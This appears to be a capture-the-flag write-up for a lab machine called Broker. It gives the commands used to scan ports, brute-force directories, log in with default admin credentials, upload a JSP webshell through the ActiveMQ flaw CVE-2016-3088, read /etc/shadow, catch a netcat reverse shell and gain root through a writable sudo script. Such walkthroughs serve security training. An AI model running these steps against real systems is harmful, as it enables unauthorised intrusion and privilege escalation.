Writeup broker{Nightlovel}

Hello everyone, I hope this write up is useful for the community since it is the first one that I write for you, greetings

SCAN

First scan ports
Lately I have used a python script to perform scans and optimize time called “threader3000”, it can also be done in a traditional way: D

pip install threader3000

add the ip of the machine to the hosts file in mi case broker.thm, and use threader3000

threader3000

use the 1 option to use nmap scan with specific ports open, service discover and scripts or

nmap -p22,1883,8161,41791 -sV -sC -T4 -Pn -oN broker.thm

ENUMERATE

now discover directories or files with gobuster

gobuster dir -u http://broker.thm:8161/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.sql,.sql

Interesting directories admin and api, let’s go to the admin site

SEARCH AND TRY

generally I try with default passwords in any login in case I am lucky
example:
admin:admin
user:admin
admin:user
admin:password

anyway in the documentation or search in google they indicate their default passwords

now we enter these credentials and we are already admin :D

EXPLOIT|| CVE-2016–3088

at this point I really stuck with it for a long time since I started looking for the activeMQ version and some exploits or CVE, finally I found a python script on github which uploads a webshell written in jsp

Finally CVE-2016–3088

coffeehb/Some-PoC-oR-ExP

wget https://github.com/coffeehb/Some-PoC-oR-ExP/tree/master/ActiveMQExP

now use the script in pyhton to upload a webshell in /api/ directory,allows PUT operations therefore we can upload files, it can also be done with curl

python2.7 ActiveMQExP.py -url http://broker.thm:8161/ -user admin -pass admin -shell /root/Desktop/cmd.jsp

first upload a txt file to see if it has PUT capability

then we open the path where our web shell has uploaded (control and double click in url), TARAN!!

at this point, try simple commands such as cat,whoami,ls,I also realized that we have the ability to read the /etc/shadow file but I could not crack the password since it is in sha512 is very difcult

here you can find several flags

Start listen netcat in your machine in port 4242

nc -lnvp 4242

After this I started to test reverse shell, I tried different methods bash tcp, ruby, python, etc finally I used traditional netcat and it worked

Connection received

we use shell treatment to have a more stable tty

python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
export TERM=xterm
ctrl+z(together)
stty raw -echo;fg
reset

we already have our stable shell

PRIVILEGE SCALE

We observe what capacities we have in sudoers

We look at this file to see what permissions we have on it

we have write permissions therefore we modify the script in python, to obtain a bash as root

nano subscribe.py

we remove the content and replace it with the following

import pty
pty.spawn(“/bin/bash”)

we save our script and execute as sudo

sudo /usr/bin/python3.7 /opt/apache-activemq-5.9.0/subscribe.py

NOW YOU ARE ROOT !!! EXCELENT NICE JOB

Thanks for reading this far, if you have any questions, do not hesitate to contact me